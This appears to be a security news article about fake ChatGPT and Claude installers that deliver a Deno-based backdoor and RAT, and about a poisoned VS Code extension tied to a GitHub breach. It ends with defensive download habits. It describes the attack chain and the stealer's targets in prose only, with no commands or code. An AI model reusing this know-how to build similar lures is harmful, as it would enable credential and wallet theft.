What Fake AI Installers Are and Why They Matter
Fake AI installers are counterfeit setup packages or plugins that pretend to install tools like ChatGPT or Claude but instead drop malware that steals credentials, manipulates browsers, and quietly takes remote control of devices. These malicious downloads often sit on otherwise trusted platforms such as GitHub and SourceForge, making them look legitimate to both casual users and experienced developers. Malwarebytes reports that attackers are currently pushing bogus installers for ChatGPT, Claude, and creative tools like Ableton Live or Kontakt, all hiding a backdoor called DinDoor and a Deno-based remote access Trojan (RAT). At the same time, GitHub has confirmed that its own internal repositories were accessed through a poisoned VS Code extension, showing that supply chain attacks can succeed even against seasoned engineering teams that rely on auto-updated tools.
How Deno RAT Campaigns Turn AI Curiosity Into Compromise
The latest fake AI tools malware campaign uses social lures and open-source platforms to deliver Deno-based payloads. Compromised YouTube channels host AI-generated videos that promote “free” or “cracked” versions of ChatGPT, Claude, and music software, directing viewers to malicious GitHub or SourceForge repositories with more than 50,000 views reported. The repositories instruct users to open a terminal and paste a command that fetches an MSI or PowerShell script for Windows, or a shell script for macOS. That script installs Scoop and WinGet, then the legitimate Deno runtime, which is abused to pull the DinDoor backdoor from a remote server and run it in memory so it never hits disk. DinDoor sets persistence, phones home to its command-and-control server, and then fetches a Deno RAT that operates entirely under the attacker’s control.
What the Malware Does: Wallet Theft and Covert Screen Streaming
Once installed, the Deno-based RAT gives attackers wide control of an infected machine, turning a fake AI tools download into a long-term breach. It can execute commands and PowerShell scripts, manage files, launch or kill processes, capture screenshots, and open SOCKS5 proxy tunnels for stealthy remote access. Its built-in stealer module targets more than 50 cryptocurrency wallets and authentication data from over 70 browsers and browser extensions, making stolen wallets and credentials a likely goal. Another related payload can hijack Microsoft Edge to covertly stream the user’s screen to the attacker, allowing real-time spying on banking sessions, developer consoles, or admin portals. Because many components run in memory and the initial installer appears connected to legitimate AI tools, traditional antivirus tools and casual visual checks are less likely to catch the compromise early.
When Legitimate Tools Turn Hostile: Nx Console and GitHub’s Breach
Fake AI tools malware is only one side of the problem; the other is genuine tools suddenly becoming hostile through supply chain attacks. GitHub confirmed that attackers accessed around 3,800 internal repositories after a single employee installed a poisoned version of Nx Console, a VS Code extension with 2.2 million installs that was briefly live on the Visual Studio Marketplace. According to StepSecurity, that malicious Nx Console release harvested tokens from GitHub, npm, AWS, HashiCorp Vault, Kubernetes, 1Password, and even targeted Claude Code configuration files under ~/.claude/settings.json. Security researchers tie this activity to TeamPCP, a financially motivated group behind the Mini Shai-Hulud supply chain worm, which rapidly iterates new payloads and has compromised npm, PyPI packages, GitHub Actions, and more. The lesson is clear: auto-updating developer extensions and security tooling can become a powerful attack vector overnight.
Practical Malware Installer Detection and Safer Download Habits
You can reduce risk from GitHub security threats and supply chain attacks with a few disciplined habits. Always confirm the official distribution channel for AI tools—ChatGPT, Claude, and other major services are offered through official websites and app stores, not random GitHub repositories advertised in YouTube comments. Treat any installer that requires pasting a long terminal command from the browser as suspicious, especially if it installs package managers and runtimes you did not plan to use, such as Scoop, WinGet, or Deno. For developers, lock down extensions: restrict VS Code and IDE plugins to a vetted list, review recent release notes, and disable auto-update for critical extensions where possible. Monitor tokens, CI/CD credentials, and access keys for unusual use, and rotate them if you suspect exposure. Finally, scan downloaded installers with up-to-date security tools and avoid executing anything from unfamiliar accounts or recently created repositories.